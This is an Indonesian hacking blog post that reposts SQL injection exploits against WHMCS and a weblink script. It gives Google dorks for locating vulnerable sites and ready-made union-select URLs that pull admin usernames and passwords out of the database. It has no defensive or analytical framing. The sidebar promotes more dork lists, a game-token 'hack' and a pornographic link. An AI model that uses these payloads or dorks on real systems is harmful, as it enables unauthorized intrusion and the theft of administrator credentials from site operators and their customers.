Pasang Iklan

Whatsapp : 0822 5516 1055

Total Pengunjung

Saturday 4 August 2012

WHMCS Vulnerable , + DORK

 No comments   
#=Info=======================================================================#

# Software: WHMCS control (WHMCompleteSolution)  Sql Injection                                                #
#                                                                                                                                       #
# Vulnerability: Remote Sql Injection                                                                                         #
# Google Dork: Powered by WHMCompleteSolution - or " inurl:WHMCS                                          

 
 
#=Sql Injection ===========================================================================================================================================================#
# Exploit: http://site/submitticket.php?step=2&deptid=001' and 1=0 union all select 1,2,3,4,message,6,7,8,9,10 from tbltickets--%20                                     
# DOWNLOAD : http://www.whmcs.com/                                                                                                                                    
# Live demo: http://ste/support/submitticket.php?step=2&deptid=001' and 1=0 union all select 1,2,3,4,username,6,7,8,password,10 from tbladmins--%20                
#=========================================================================================================================================================================#


 Dork :inurl:"weblink_cat_list.php?bcat_id="
**************************************************************************/
[ Vulnerable File ]
 
http://server/weblink_cat_list.php?bcat_id=[N.A.S.T ]
 
[ Exploit ]
 
http://server/weblink_cat_list.php?bcat_id=-1+UNION+SELECT+1,GROUP_concat(id,0x3a,username,0x3a,password),3,4+from+user
 
 
[  GReets ]




sumber
Share This:    Facebook Twitter Google+ Stumble Digg

0 komentar:

Post a Comment

Subscribe to: Post Comments (Atom)

Popular Posts

  • RFI Dorks
    buat jooml0 dan mambo0 /components/com_flyspray/startdown.php?file= /administrator/components/com_admin/admin.admin.html.php?mosConfig_a...
  • Rahasia : Hack Uang / Money TOP ELeven !
    hehehe.... bosan dah saya jualan TOkken TOP eleven ... .. hmm .. mau ane beri tahu dulu rahasinya tapi minggu depan aja ya untuk aplikasi ...
  • dork thimtub wordpress , simple
    !tim /wp-content/themes/modularity/includes/timthumb.php "Design by Graph Paper Press" !tim /wp-content/themes/cadabrapress/scrip...
  • google dork sql Hunter
    inurl:/general.php?*id=* inurl:/careers-detail.asp?id= inurl:/WhatNew.asp?page=&id= inurl:/gallery.asp?cid= inurl:/publications.asp?type...
  • Dork untuk RFI
    /components/com_flyspray/startdown.php?file= /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path= /components...
  • Kumpulan Bugs Dork Timrhumb wordpress , Tema WOrdpress RFI
    http://example.com/wp-content/themes/TheStyle/timthumb.php     * http://example.com/wp-content/themes/nool/timthumb.php     * http://example...
  • situs bokep yang bisa di download ke hp
    cobain ini http://phonerotica.com http://sexowap.com -----------------------------------------------------------------------------------...
  • Kumpulan DOrk Untuk RFI
    /includes/header.php?systempath= /Gallery/displayCategory.php?basepath= /index.inc.php?PATH_Includes= /nphp/nphpd.php?nphp_config[LangFile]=...
  • Jasa Transfer Pembelian TOKEN Top Eleven 100% Aman !
    untuk yang berminat pembelian token TOP eleven , ini harga murah dan fantastis ... 7 Token = Rp. 12.000 15 Token = Rp. 24.000 42 Token =...
  • [Pengaduan] Apakah memilih lambang rusak? - Mobile Legend
    Saya rasa saya tidak perlu mengubah emblem sepanjang waktu ketika memilih pahlawan.  Misalnya, dengan Tigrael, aku harus mengatur tangki em...
@jablayInside. Powered by Blogger.
Scroll To Top